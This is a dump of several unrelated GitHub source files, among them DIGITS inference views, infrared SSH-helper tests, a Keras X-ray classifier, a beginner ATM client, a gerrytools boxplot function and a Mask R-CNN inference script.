image_folder and not os.path.isabs(path):\n path = os.path.join(image_folder, path)\n paths.append(path)\n\n if num_test_images is not None and len(paths) >= num_test_images:\n break\n\n # create inference job\n inference_job = ImageInferenceJob(\n username=utils.auth.get_username(),\n name=\"Infer Many Images\",\n model=model_job,\n images=paths,\n epoch=epoch,\n layers='none',\n resize=resize,\n )\n\n # schedule tasks\n scheduler.add_job(inference_job)\n\n # wait for job to complete\n inference_job.wait_completion()\n\n # retrieve inference data\n inputs, outputs, _ = inference_job.get_data()\n\n # set return status code\n status_code = 500 if inference_job.status == 'E' else 200\n\n # delete job folder and remove from scheduler list\n scheduler.delete_job(inference_job)\n\n if outputs is not None and len(outputs) < 1:\n # an error occurred\n outputs = None\n\n if inputs is not None:\n paths = [paths[idx] for idx in inputs['ids']]\n inference_views_html, header_html, app_begin_html, app_end_html = get_inference_visualizations(\n model_job.dataset,\n inputs,\n outputs)\n else:\n inference_views_html = None\n header_html = None\n app_begin_html = None\n app_end_html = None\n\n if request_wants_json():\n result = {}\n for i, path in enumerate(paths):\n result[path] = dict((name, blob[i].tolist()) for name, blob in outputs.iteritems())\n return flask.jsonify({'outputs': result}), status_code\n else:\n return flask.render_template(\n 'models/images/generic/infer_many.html',\n model_job=model_job,\n job=inference_job,\n paths=paths,\n inference_views_html=inference_views_html,\n header_html=header_html,\n app_begin_html=app_begin_html,\n app_end_html=app_end_html,\n ), status_code\n\n\ndef create_inference_db(model_job, data_extension_id):\n # create instance of extension class\n extension_class = extensions.data.get_extension(data_extension_id)\n if hasattr(model_job.dataset, 'extension_userdata'):\n extension_userdata = model_job.dataset.extension_userdata\n else:\n extension_userdata = {}\n extension_userdata.update({'is_inference_db': True})\n extension = extension_class(**extension_userdata)\n\n extension_form = extension.get_inference_form()\n extension_form_valid = extension_form.validate_on_submit()\n\n if not extension_form_valid:\n errors = extension_form.errors.copy()\n raise werkzeug.exceptions.BadRequest(repr(errors))\n\n extension.userdata.update(extension_form.data)\n\n # create job\n job = GenericDatasetJob(\n username=utils.auth.get_username(),\n name='Inference dataset',\n group=None,\n backend='lmdb',\n feature_encoding='none',\n label_encoding='none',\n batch_size=1,\n num_threads=1,\n force_same_shape=0,\n extension_id=data_extension_id,\n extension_userdata=extension.get_user_data(),\n )\n\n # schedule tasks and wait for job to complete\n scheduler.add_job(job)\n job.wait_completion()\n\n # check for errors\n if job.status != Status.DONE:\n msg = \"\"\n for task in job.tasks:\n if task.exception:\n msg = msg + task.exception\n if task.traceback:\n msg = msg + task.exception\n raise RuntimeError(msg)\n\n return job\n\n\ndef get_datasets(extension_id):\n if extension_id:\n jobs = [j for j in scheduler.jobs.values()\n if isinstance(j, GenericDatasetJob) and\n j.extension_id == extension_id and (j.status.is_running() or j.status == Status.DONE)]\n else:\n jobs = [j for j in scheduler.jobs.values()\n if (isinstance(j, GenericImageDatasetJob) or isinstance(j, GenericDatasetJob)) and\n (j.status.is_running() or j.status == Status.DONE)]\n return [(j.id(), j.name())\n for j in 
sorted(jobs, cmp=lambda x, y: cmp(y.id(), x.id()))]\n\n\ndef get_inference_visualizations(dataset, inputs, outputs):\n # get extension ID from form and retrieve extension class\n if 'view_extension_id' in flask.request.form:\n view_extension_id = flask.request.form['view_extension_id']\n extension_class = extensions.view.get_extension(view_extension_id)\n if extension_class is None:\n raise ValueError(\"Unknown extension '%s'\" % view_extension_id)\n else:\n # no view extension specified, use default\n extension_class = extensions.view.get_default_extension()\n extension_form = extension_class.get_config_form()\n\n # validate form\n extension_form_valid = extension_form.validate_on_submit()\n if not extension_form_valid:\n raise ValueError(\"Extension form validation failed with %s\" % repr(extension_form.errors))\n\n # create instance of extension class\n extension = extension_class(dataset, **extension_form.data)\n\n visualizations = []\n # process data\n n = len(inputs['ids'])\n for idx in xrange(n):\n input_id = inputs['ids'][idx]\n input_data = inputs['data'][idx]\n output_data = {key: outputs[key][idx] for key in outputs}\n data = extension.process_data(\n input_id,\n input_data,\n output_data)\n template, context = extension.get_view_template(data)\n visualizations.append(\n flask.render_template_string(template, **context))\n # get header\n template, context = extension.get_header_template()\n header = flask.render_template_string(template, **context) if template else None\n app_begin, app_end = extension.get_ng_templates()\n return visualizations, header, app_begin, app_end\n\n\ndef get_previous_networks():\n return [(j.id(), j.name()) for j in sorted(\n [j for j in scheduler.jobs.values() if isinstance(j, GenericImageModelJob)],\n cmp=lambda x, y: cmp(y.id(), x.id())\n )\n ]\n\n\ndef get_previous_networks_fulldetails():\n return [(j) for j in sorted(\n [j for j in scheduler.jobs.values() if isinstance(j, GenericImageModelJob)],\n cmp=lambda x, y: cmp(y.id(), x.id())\n )\n ]\n\n\ndef get_previous_network_snapshots():\n prev_network_snapshots = []\n for job_id, _ in get_previous_networks():\n job = scheduler.get_job(job_id)\n e = [(0, 'None')] + [(epoch, 'Epoch #%s' % epoch)\n for _, epoch in reversed(job.train_task().snapshots)]\n if job.train_task().pretrained_model:\n e.insert(0, (-1, 'Previous pretrained model'))\n prev_network_snapshots.append(e)\n return prev_network_snapshots\n\n\ndef get_pretrained_networks():\n return [(j.id(), j.name()) for j in sorted(\n [j for j in scheduler.jobs.values() if isinstance(j, PretrainedModelJob)],\n cmp=lambda x, y: cmp(y.id(), x.id())\n )\n ]\n\n\ndef get_pretrained_networks_fulldetails():\n return [(j) for j in sorted(\n [j for j in scheduler.jobs.values() if isinstance(j, PretrainedModelJob)],\n cmp=lambda x, y: cmp(y.id(), x.id())\n )\n ]\n\n\ndef get_data_extensions():\n \"\"\"\n return all enabled data extensions\n \"\"\"\n data_extensions = {\"all-default\": \"Default\"}\n all_extensions = extensions.data.get_extensions()\n for extension in all_extensions:\n data_extensions[extension.get_id()] = extension.get_title()\n return data_extensions\n\n\ndef get_view_extensions():\n \"\"\"\n return all enabled view extensions\n \"\"\"\n view_extensions = {}\n all_extensions = extensions.view.get_extensions()\n for extension in all_extensions:\n view_extensions[extension.get_id()] = extension.get_title()\n return 
view_extensions\n","repo_name":"NVIDIA/DIGITS","sub_path":"digits/model/images/generic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":31978,"program_lang":"python","lang":"en","doc_type":"code","stars":4106,"dataset":"github-code","pt":"48"} +{"seq_id":"14980963630","text":"import random\nimport autopy\nimport pyautogui\nimport time\nimport json\nfrom threading import Timer\nimport cv2\nimport pytesseract\n\ndef click_readyup_button():\n print('CHECKING...')\n if should_click():\n try:\n autopy.mouse.move(*(230, 928))\n time.sleep(.2)\n autopy.mouse.click()\n except TypeError:\n print('INTERNAL ERROR OCCURED. CONTACT DEVELOPER.')\n\ndef get_position():\n print(\n pyautogui.position()\n )\n\ndef should_click():\n box = ((140, 950), (170, 42))\n screenshot = autopy.bitmap.capture_screen(box)\n screenshot.save('screenshot.png')\n img = cv2.imread('screenshot.png')\n threshold = 90\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n thresh = cv2.threshold(gray, threshold, 255, cv2.THRESH_BINARY_INV)[1]\n # cv2.imshow('thresh', thresh)\n # cv2.waitKey(0)\n scanned_text = pytesseract.image_to_string(img, lang='eng', config='--psm 6')\n try:\n print(scanned_text)\n if 'READY' in scanned_text:\n print('read READY in screenshot')\n return True\n elif 'CANCEL' in scanned_text:\n print('read CANCEL in screenshot')\n return True\n else:\n print('read nothing in screenshot')\n return False\n except AttributeError:\n raise Exception(f'OCR MODULE: COULD NOT RETRIEVE TEXT')\n\nif __name__ == '__main__':\n print(\n should_click()\n )","repo_name":"Zenahr/ALUB","sub_path":"lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6427629729","text":"numbers = [1,2,3,4,5,6,7,8,9,10]\r\n\r\n# 1.a for loop example - I want 'n' for each 'n' in numbers\r\n\r\nmy_list = []\r\nfor n in numbers:\r\n my_list.append(n)\r\nprint(my_list)\r\n\r\n# 1.b Comprehension - I want 'n' for each 'n' in numbers\r\n\r\nmy_list = [n for n in numbers]\r\nprint(my_list)\r\n\r\n# 2.a for loop example - I want 'n*n' for each 'n' in numbers\r\nmy_list = []\r\nfor n in numbers:\r\n my_list.append(n*n)\r\nprint(my_list)\r\n\r\n# 2.b Comprehension - I want 'n*n' for each 'n' in numbers\r\n\r\nmy_list = [n*n for n in numbers]\r\nprint(my_list)\r\n\r\n# 3.a for loop example - I want 'n' for each 'n' in numbers if n is even\r\nmy_list = []\r\nfor n in numbers:\r\n if n%2 == 0:\r\n my_list.append(n)\r\nprint(my_list)\r\n\r\n# 3.b Comprehension - I want 'n*n' for each 'n' in numbers\r\n\r\nmy_list = [n for n in numbers if n%2 == 0]\r\nprint(my_list)\r\n\r\n\r\n# 4.a for loop example - I want (letter,num) for each letter in abcde and each num in 12345 \r\nmy_list = []\r\nfor letter in 'abcde':\r\n for num in range(5):\r\n my_list.append((letter,num))\r\nprint(my_list)\r\n\r\n# 4.b Comprehension - I want (letter,num) for each letter in abcde and each num in 12345 \r\nmy_list = [(letter,num) for letter in 'abcde' for num in range(5)]\r\nprint(my_list)\r\n\r\n\r\n# 5.a for loop example - Dictionary comprehension\r\nfnames = ['Sachin','Sourav','Rahul','Mahendra','Virat']\r\nsnames = ['Tendulkar','Ganguly','Dravid','Dhoni','Kohli']\r\n\r\n# Dictionary of dict = {'fname':'sname'} for each fname and sname in zip(fname,sname)\r\nmy_dict = {}\r\nfor fname,sname in zip(fnames,snames):\r\n my_dict[fname] = sname\r\nprint(my_dict)\r\n\r\n# 5.b Dictionary comprehension - Remove Viart from the list\r\nmy_dict = 
{fname:sname for fname,sname in zip(fnames,snames) if fname != 'Virat'}\r\nprint(my_dict)\r\n\r\n# 6.a Set Comprehensions - for loop generate squared value of a set\r\nnumbers = [1,2,3,4,5,6,7,8,6,3,2,4,5,8,1,2,8,9,2,3,5,6,5,9,10]\r\nmy_set = set()\r\nfor n in numbers:\r\n my_set.add(n*n)\r\nprint(my_set)\r\n\r\n# 6.b Set Comprehensions - generate squared value of a set\r\nmy_set = {n*n for n in numbers}\r\nprint(my_set)\r\n","repo_name":"manjubsavanth/PythonProgramming","sub_path":"ListComprehension.py","file_name":"ListComprehension.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10911717244","text":"import pytest\n\nfrom infrared.core.utils import interactive_ssh as issh\nfrom infrared.core.utils import exceptions\nfrom infrared.core.services import workspaces\n\n\n@pytest.fixture(scope=\"session\")\ndef workspace_manager_fixture(tmpdir_factory):\n \"\"\"Sets the default workspace direcotry to the temporary one. \"\"\"\n\n temp_workspace_dir = tmpdir_factory.mktemp('pmtest')\n workspace_manager = workspaces.WorkspaceManager(str(temp_workspace_dir))\n from infrared.core.services import CoreServices\n CoreServices.register_service(\"workspace_manager\", workspace_manager)\n yield workspace_manager\n\n\n@pytest.fixture()\ndef test_workspace(workspace_manager_fixture):\n \"\"\"Creates test workspace in the temp directory. \"\"\"\n\n name = 'test_workspace'\n test_workspace = workspace_manager_fixture.create(name)\n workspace_manager_fixture.activate(test_workspace.name)\n test_workspace.inventory = \"tests/example/test_ssh_inventory\"\n yield test_workspace\n if workspace_manager_fixture.has_workspace(name):\n workspace_manager_fixture.delete(name)\n\n\ndef test_parse_inventory(workspace_manager_fixture, test_workspace, mocker):\n import os\n mocker.patch(\"os.system\")\n\n ssh_cmd_str = \" \".join([\n \"ssh -i /dev/null\",\n \" -o ForwardAgent=yes\",\n \"-o ServerAliveInterval=30\",\n \"-o ControlMaster=auto\",\n \"-o ControlPersist=30m\",\n \"-o StrictHostKeyChecking=no\",\n \"-o UserKnownHostsFile=/dev/null\",\n \"-o ProxyCommand=\\\"ssh\",\n \"-o StrictHostKeyChecking=no\",\n \"-o UserKnownHostsFile=/dev/null\",\n \"-W %h:%p -i /dev/null ttest@tthost\\\"\",\n \" -p 33 -t test-user@0.0.0.0\"\n ])\n\n issh.ssh_to_host(\"test_host\")\n\n # make sure we aren't calling ssh more than once\n os.system.assert_called_once_with(ssh_cmd_str)\n\n ssh_cmd_str = \" \".join([\n \"ssh -i /dev/null\",\n \" -o ForwardAgent=yes\",\n \"-o ServerAliveInterval=30\",\n \"-o ControlMaster=auto\",\n \"-o ControlPersist=30m\",\n \"-o StrictHostKeyChecking=no\",\n \"-o UserKnownHostsFile=/dev/null\",\n \"-o ProxyCommand=\\\"ssh\",\n \"-o StrictHostKeyChecking=no\",\n \"-o UserKnownHostsFile=/dev/null\",\n \"-W %h:%p -i /dev/null ttest@tthost\\\"\",\n \" -p 33 -t test-user@0.0.0.0 \\\"some cmd line\\\"\"\n ])\n\n issh.ssh_to_host(\"test_host\", \"some cmd line\")\n\n os.system.assert_called_with(ssh_cmd_str)\n\n\ndef test_wrong_host_exception(workspace_manager_fixture, test_workspace):\n\n with pytest.raises(exceptions.IRSshException):\n issh.ssh_to_host(\"wrong_host\")\n\n\ndef test_wrong_connection_type_exception(workspace_manager_fixture,\n test_workspace):\n\n with pytest.raises(exceptions.IRSshException):\n 
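# 'localhost' is not reachable over ssh in the example inventory, so the lookup should raise\n        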
issh.ssh_to_host(\"localhost\")\n","repo_name":"redhat-openstack/infrared","sub_path":"tests/test_interactive_ssh.py","file_name":"test_interactive_ssh.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"48"} +{"seq_id":"38024251454","text":"# Q11-Projekt Risiko\n# Extrusionsobjekte am Beispiel eines Spielsteins\nfrom visual import *\n\nclass Vierzack(extrusion):\n \"modelliert Spielstein mit 4 Ecken\"\n def __init__(self, pos=(0,0,0), höhe=3, color=color.red):\n \n # 1. 2D-Figuren erstellen\n viereck = Polygon([(1,1),(1,-1),(-1,-1),(-1,1)])\n kreis1 = shapes.circle(pos=( 1, 1), radius=0.9)\n kreis2 = shapes.circle(pos=( 1,-1), radius=0.9)\n kreis3 = shapes.circle(pos=(-1,-1), radius=0.9)\n kreis4 = shapes.circle(pos=(-1, 1), radius=0.9)\n\n # 2. Pfad erzeugen (hier entlang y-Achse)\n # Tupel lassen sich elementweise addieren, Vektoren schon!\n pfad = [vector(pos),vector(pos) + vector(0,höhe,0)]\n\n # 3. Extrusionsobjekt erzeugen\n extrusion.__init__(self, pos=pfad, color=color,\n shape=viereck-kreis1-kreis2-kreis3-kreis4,\n angle2=pi, material=materials.plastic)\n\nclass Kanone(extrusion):\n \"modelliert Kanonenrohr bzw. Spielstein\"\n def __init__(self, pos=(0,1,0), länge=3, material=materials.silver):\n\n # 1. 2D-Figur erstellen\n kreisaussen = shapes.circle(pos=(0,0), radius = 0.5)\n kreisinnen = shapes.circle(pos=(0,0), radius = 0.3)\n\n # 2. Pfad erzeugen\n pfad = [vector(pos), vector(pos) + vector(länge,0,0)]\n\n # 3. Object erzeugen\n extrusion.__init__(self, pos=pfad, material=material,\n shape=kreisaussen-kreisinnen, angle2=pi)\n\n # 4. Kugel hinten drauf\n\n ende = sphere(pos=pos, radius=.5, material=material)\n bobbel = sphere(pos=(-.4,1,0),radius=.25, material=material)\n\n # 5. 
Räder\n\n rad1 = ring(pos=(.5,.7,.6),material=materials.wood,axis=(0,0,1),\n radius=.7, thickness=.2)\n rad2 = ring(pos=(.5,.7,-.6),material=materials.wood,axis=(0,0,1),\n radius=.7, thickness=.2)\n speiche1 = cylinder(pos=(-.25,.7,.6),material=materials.wood,axis=(1.5,0,0),\n radius=.15)\n speiche2 = cylinder(pos=(.5,0,.6),material=materials.wood,axis=(0,1.5,0),\n radius=.15)\n speiche3 = cylinder(pos=(-.25,.7,-.6),material=materials.wood,axis=(1.5,0,0),\n radius=.15)\n speiche4 = cylinder(pos=(.5,0,-.6),material=materials.wood,axis=(0,1.5,0),\n radius=.15)\n\n\nif __name__ == \"__main__\":\n \"Testanweisungen, falls standalone-Aufruf\"\n \"\"\"v1 = Vierzack()\n v2 = Vierzack(pos=(5,0,-3), color=color.green)\n v3 = Vierzack(pos=(-5,0,5), color=color.yellow)\n v4 = Vierzack(pos=(4,0,-7), color=(0.8,0.5,0.2)) #braun\n v5 = Vierzack(pos=(-6,0,-6), color=color.magenta)\n v6 = Vierzack(pos=(-2,0,4), color=color.blue)\"\"\"\n k1 = Kanone()\n\n while True:\n rate(25)\n pass\n \n","repo_name":"huegit/q11","sub_path":"beispielskript_kanone_aEpple.py","file_name":"beispielskript_kanone_aEpple.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"de","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"3491435549","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport keras\r\nimport cv2\r\nfrom keras.layers import Input\r\nfrom keras.models import Model\r\nimport random\r\nfrom tensorflow.keras.layers import Dense, Conv2D, Flatten, MaxPooling2D\r\nimport tensorflow as tf\r\nimport os.path\r\nimport pandas as pd\r\nfrom tensorflow.keras.applications.densenet import DenseNet121\r\n\r\nTESTING_IMAGES_FOLDER = \"testing/\"\r\nWEIGHTS_FOLDER = \"weights/\"\r\n\r\n# class_names = \"Atelectasis,Cardiomegaly,Effusion,Infiltration,Mass,Nodule,Pneumonia,Pneumothorax,Consolidation,Edema,Emphysema,Fibrosis,Pleural_Thickening,Hernia\"\r\nclass_names = \"Atelectasis,Cardiomegaly,Consolidation,Edema,Pleural_Effusion\"\r\nn_classes = 5\r\n\r\nIMG_HEIGHT = 224\r\nIMG_WIDTH = 224\r\nIMG_CHANNELS = 3\r\n\r\ninput_shape = (IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS)\r\nimg_input = Input(shape=input_shape)\r\n\r\n\r\nprint(\"** load model **\")\r\nbase_model = DenseNet121(input_shape=input_shape, include_top=False, weights='imagenet', input_tensor=img_input, pooling=\"avg\") # for RGB\r\nx = base_model.output\r\npredictions = Dense(n_classes, activation=\"sigmoid\", name=\"predictions\")(x)\r\nmodel = Model(inputs=img_input, outputs=predictions)\r\n# model.summary()\r\n\r\n\r\nprint(\"** load weights **\")\r\nmodel.load_weights(os.path.join(WEIGHTS_FOLDER, \"best_weights_15559827687076797.h5\"))\r\nprint(model.get_weights()[0])\r\n\r\n\r\n# Data Read\r\nfor test_img_name in os.listdir(TESTING_IMAGES_FOLDER):\r\n img = cv2.imread(os.path.join(TESTING_IMAGES_FOLDER, test_img_name))\r\n img = cv2.resize(img, (IMG_WIDTH, IMG_HEIGHT))\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n img = img / 255.\r\n # img = np.mean(img, axis=2) convert to 1-dim gray\r\n # print(img)\r\n\r\n Xtest = img\r\n Xtest = Xtest.reshape(-1, IMG_HEIGHT, IMG_WIDTH, IMG_CHANNELS)\r\n\r\n # demonstrate prediction\r\n print(\"file: \", test_img_name)\r\n print(class_names)\r\n yhat = model.predict(Xtest, verbose=1)\r\n print(np.round(yhat, 4))\r\n max_pos = np.argmax(yhat, axis=1)\r\n class_list = class_names.split(\",\")\r\n print(max_pos)\r\n print(class_list[max_pos[0]])\r\n 
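# blank line to separate this image's report from the next\r\n    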
print(\"\\n\")\r\n","repo_name":"bachtses/Classification-MultiLabel-Cancer-Images-Template-Tags","sub_path":"5_multi_label_classification_predict.py","file_name":"5_multi_label_classification_predict.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"29989902020","text":"import requests\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n\nimport Account\nimport Card\n\nRoot = \"api.bearRobotics.com/ATM\" # API Root url\n\n# Alert\ndef Alert(text):\n    print(\"====================================\")\n    print(\"===============Alert================\")\n    print(\"====================================\")\n    print(\"=>\", text)\n\n# check the card is valid => returns the HTTP status code of the verification call\ndef CheckCard(cardNumber, PIN):\n    datas = { 'cardNumber' : cardNumber, 'PIN' : PIN }\n    url = Root + \"/CheckCard\"\n    headers = {'Content-Type' : 'application/json; charset=utf-8'}\n    \n    response = requests.post(url, data=datas, headers=headers)\n    return response.status_code\n\ndef EjectCard():\n    # card eject\n    return True\n\ndef EjectMoney():\n    # money eject\n    return True\n\ndef GetAccount(cardNumber, PIN):\n    # get balance\n    datas = { 'cardNumber' : cardNumber, 'PIN' : PIN }\n    url = Root + \"/GetBalnaceAccount\"\n    headers = {'Content-Type' : 'application/json; charset=utf-8'}\n    \n    response = requests.post(url, data=datas, headers=headers)\n    return response\n\ndef Balance(_Account):\n    Alert(\"your balance is \" + str(_Account.Balance)) # Alert takes a single text argument\n    return _Account.Balance\n    \ndef Deposit(_Account, IN):\n\n    Balance = _Account.Balance + IN\n    \n    # save balance\n    datas = { 'Balance' : Balance }\n    url = Root + \"/Deposit\"\n    headers = {'Content-Type' : 'application/json; charset=utf-8'}\n    \n    response = requests.post(url, data=datas, headers=headers)\n    return response\n\ndef Withdrawal(_Account, Out):\n    Balance = _Account.Balance - Out # a withdrawal must subtract the amount from the balance\n    \n    # save balance\n    datas = { 'Balance' : Balance }\n    url = Root + \"/Withdrawal\"\n    headers = {'Content-Type' : 'application/json; charset=utf-8'}\n    \n    response = requests.post(url, data=datas, headers=headers)\n    return response\n\ndef main(_Account, _Card):\n\n    while True:\n\n        Alert(\"Please Enter your Card. If you want to exit the program, Press 0\")\n        CardNumber = input(\"Card Number >> \")\n        PIN = input(\"PIN >> \")\n\n        # if user press 0 => exit (input() returns a string)\n        if CardNumber == \"0\":\n            exit()\n\n        _Card.set([CardNumber, PIN]) # set\n\n        result = CheckCard(_Card.Number, _Card.PIN) # check card validation (plain call, these helpers are not coroutines)\n\n\n        if result == 200: # assume the API answers HTTP 200 for a valid card\n            Alert(\"Press 1 to balance check or 2 to deposit money or 3 to withdrawal money\")\n            order = int(input()) # Balance // Deposit // Withdrawal\n\n            # class\n            balance_information = GetAccount(_Card.Number, _Card.PIN)\n            _Account.set(balance_information)\n\n            if order == 1:\n                Balance(_Account)\n\n            if order == 2:\n                Alert(\"Choose the amount to deposit\")\n                IN = int(input())\n\n                Alert(\"Please Enter money\")\n                Money = int(input())\n\n                if IN != Money:\n                    Alert(\"The deposit amount is different. Please try again\")\n                    EjectMoney() # Money Eject\n                    EjectCard() # Card Eject\n\n                if IN == Money:\n                    Deposit_result = Deposit(_Account, IN) # Deposit takes the account and the amount\n\n                    if Deposit_result.status_code != 200:\n                        Alert(\"Error : The deposit operation did not proceed. Please try again\")\n\n                    if Deposit_result.status_code == 200:\n                        Alert(str(IN) + \"$ has been deposited into your account. The remaining balance is \" + str(_Account.Balance + IN))\n\n            if order == 3:\n                Alert(\"Choose the amount to withdrawal\")\n                Out = int(input())\n\n                if Out > _Account.Balance:\n                    Alert(\"The withdrawal amount is greater than your balance. Please try again\")\n                    EjectMoney() # Money Eject\n                    EjectCard() # Card Eject\n\n                else:\n                    Withdrawal_result = Withdrawal(_Account, Out)\n\n                    if Withdrawal_result.status_code != 200:\n                        Alert(\"Error : The withdrawal operation did not proceed. Please try again\")\n\n                    if Withdrawal_result.status_code == 200:\n                        Alert(str(Out) + \"$ has been withdrawn from your account. The remaining balance is \" + str(_Account.Balance - Out))\n\n        else:\n            Alert(\"Error : Card is invalid\") # Alert\n\nif __name__ == \"__main__\":\n\n\n    _Account = Account.Account() # account information (assumes the Account module defines an Account class)\n    _Card = Card.Card() # Card information (assumes the Card module defines a Card class)\n\n    main(_Account, _Card)\n\n    os.execl(sys.executable, sys.executable, *sys.argv) # loop","repo_name":"givinkwon/test","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"71725252946","text":"import random\n\nfrom matplotlib.axes import Axes\n\nfrom .colors import citizenBlue, defaultGray, districtr\n\n\ndef boxplot(\n    ax,\n    scores,\n    xticklabels=None,\n    labels=None,\n    proposed_info={},\n    percentiles=(1, 99),\n    rotation=0,\n    ticksize=12,\n    jitter=1 / 3,\n) -> Axes:\n    r\"\"\"\n    Plot boxplots, which takes `scores` — a dictionary where each value\n    (corresponding to an ensemble, citizens' ensemble, or proposed plans),\n    will be a list of lists, where each sublist will be its own box. Proposed\n    scores will be plotted as colored circles on their respective box. Color the\n    boxplots conditioned on the kind of the scores (ensemble or citizen), and\n    trim each sublist to only the values between the specified percentiles.\n\n    Args:\n        ax (Axes): `Axes` object on which the boxplots are plotted.\n        scores (dict): Dictionary with keys of `ensemble`, `citizen`, `proposed`\n            which map to lists of numerical scores.\n        proposed_info (dict, optional): Dictionary with keys of `colors`, `names`;\n            the \\(i\\)th color in `color` corresponds to the \\(i\\)th name in `names`.\n        percentiles (tuple, optional): Observations outside this range of\n            percentiles are ignored. 
Defaults to `(1, 99)`, such that observations\n between the 1st and 99th percentiles (inclusive) are included, and\n all others are ignored.\n rotation (float, optional): Tick labels are rotated `rotation` degrees\n _counterclockwise_.\n ticksize (float, optional): Font size for tick labels.\n jitter (float, optional): When there is more than one proposed plan,\n adjust its detail points by a value drawn from \\(\\mathcal U (-\\epsilon,\n \\epsilon)\\) where \\(\\epsilon = \\) `jitter`.\n labels (list, optional): x- and y-axis labels, if desired.\n xticklabels (list, optional): Labels for the boxes, default to integers.\n\n Returns:\n `Axes` object on which the violins are plotted.\n \"\"\"\n # Get all the scores into one list; pick a face color.\n ensemble = scores[\"ensemble\"] if \"ensemble\" in scores else scores[\"citizen\"]\n facecolor = defaultGray if \"ensemble\" in scores else citizenBlue\n\n # Specify the boxplots' style.\n boxstyle = {\n \"lw\": 1 / 2,\n \"color\": facecolor,\n }\n\n # Plot boxplots.\n ax.boxplot(\n ensemble,\n whis=percentiles,\n boxprops=boxstyle,\n whiskerprops=boxstyle,\n capprops=boxstyle,\n medianprops=boxstyle,\n showfliers=False,\n )\n\n # Set xticks, xlabels, and x-axis limits\n if not xticklabels:\n xticklabels = range(1, len(scores[\"ensemble\"]) + 1)\n ax.set_xticks(range(1, len(ensemble) + 1))\n ax.set_xticklabels(xticklabels, fontsize=ticksize, rotation=rotation)\n ax.set_xlim(0.5, len(ensemble) + 0.5)\n\n # Plot each proposed plan individually, adjusting its detail points by\n # a value drawn from the uniform distribution of specified width centered on\n # the index of the violin.\n if \"proposed\" in scores:\n for boxplot in range(len(scores[\"proposed\"])):\n for plan, score in enumerate(scores[\"proposed\"][boxplot]):\n # Horizontally jitter proposed scores if there are multiple scores\n # at the same height.\n jitter_val = (\n random.uniform(-jitter, jitter)\n if scores[\"proposed\"][boxplot].count(score) > 1\n else 0\n )\n color_val = \"\"\n if \"colors\" in scores[\"proposed\"]:\n color_val = scores[\"proposed\"][\"colors\"][boxplot]\n else:\n color_val = districtr(plan + 1).pop()\n ax.scatter(\n boxplot + 1 + jitter_val,\n score,\n color=color_val,\n edgecolor=\"black\",\n s=100,\n alpha=0.9,\n label=proposed_info[\"names\"][plan] if boxplot == 0 else None,\n )\n ax.legend()\n\n if labels:\n ax.set_xlabel(labels[0], fontsize=24)\n ax.set_ylabel(labels[1], fontsize=24)\n\n return ax\n","repo_name":"mggg/gerrytools","sub_path":"gerrytools/plotting/boxplot.py","file_name":"boxplot.py","file_ext":"py","file_size_in_byte":4237,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43632861100","text":"from mrcnn.config import Config\r\nfrom mrcnn import model as modellib\r\nfrom mrcnn.utils import Dataset\r\nfrom mrcnn import visualize\r\nfrom os import listdir\r\n\r\n\r\nclass MyMaskRCNNConfig(Config):\r\n NAME = \"MaskRCNN_config\"\r\n\r\n GPU_COUNT = 1\r\n IMAGES_PER_GPU = 1\r\n\r\n # number of classes + BG\r\n NUM_CLASSES = 2 + 1\r\n\r\n DETECTION_MIN_CONFIDENCE = 0.9\r\n\r\n MAX_GT_INSTANCES = 10\r\n\r\n\r\nclass BlurAndScratchDataset(Dataset):\r\n def load_dataset(self, dataset_dir, is_train=True):\r\n\r\n self.add_class(\"dataset\", 1, \"blur\")\r\n self.add_class(\"dataset\", 2, \"scratch\")\r\n\r\n images_dir = dataset_dir + '/images/'\r\n annotations_dir = dataset_dir + '/annots/'\r\n\r\n for filename in listdir(images_dir):\r\n\r\n image_id = filename[:-4]\r\n # after 120 if we 
are building the train set\r\n new_image_id = 0\r\n if image_id[0:4] == 'blur':\r\n new_image_id = image_id[4:]\r\n elif image_id[0:7] == 'scratch':\r\n new_image_id = image_id[7:]\r\n\r\n if is_train and int(new_image_id) >= 120:\r\n continue\r\n # before 120 if we are building the test/val set\r\n if not is_train and int(new_image_id) < 120:\r\n continue\r\n\r\n img_path = images_dir + filename\r\n\r\n ann_path = annotations_dir + image_id + '.xml'\r\n\r\n self.add_image('dataset', image_id=image_id, path=img_path, annotation=ann_path)\r\n\r\n def image_reference(self, image_id):\r\n info = self.image_info[image_id]\r\n return info['path']\r\n\r\n\r\ntest_set = BlurAndScratchDataset()\r\ntest_set.load_dataset('blur_and_scratch_dataset', is_train=False)\r\ntest_set.prepare()\r\n\r\nmodel_path = 'mask_rcnn_.1576924943.852383.h5'\r\nconfig = MyMaskRCNNConfig()\r\nmodel = modellib.MaskRCNN(mode=\"inference\", config=config, model_dir='./')\r\nmodel.load_weights(model_path, by_name=True)\r\nimage_id = 4\r\nimage, image_meta, gt_class_id, gt_bbox, gt_mask = modellib.load_image_gt(test_set, config, image_id,\r\n use_mini_mask=False)\r\ninfo = test_set.image_info[image_id]\r\nprint(\"image ID: {}.{} ({}) {}\".format(info[\"source\"], info[\"id\"], image_id,\r\n test_set.image_reference(image_id)))\r\nresults = model.detect([image], verbose=1)\r\nr = results[0]\r\nvisualize.display_instances(image, r['rois'], r['masks'], 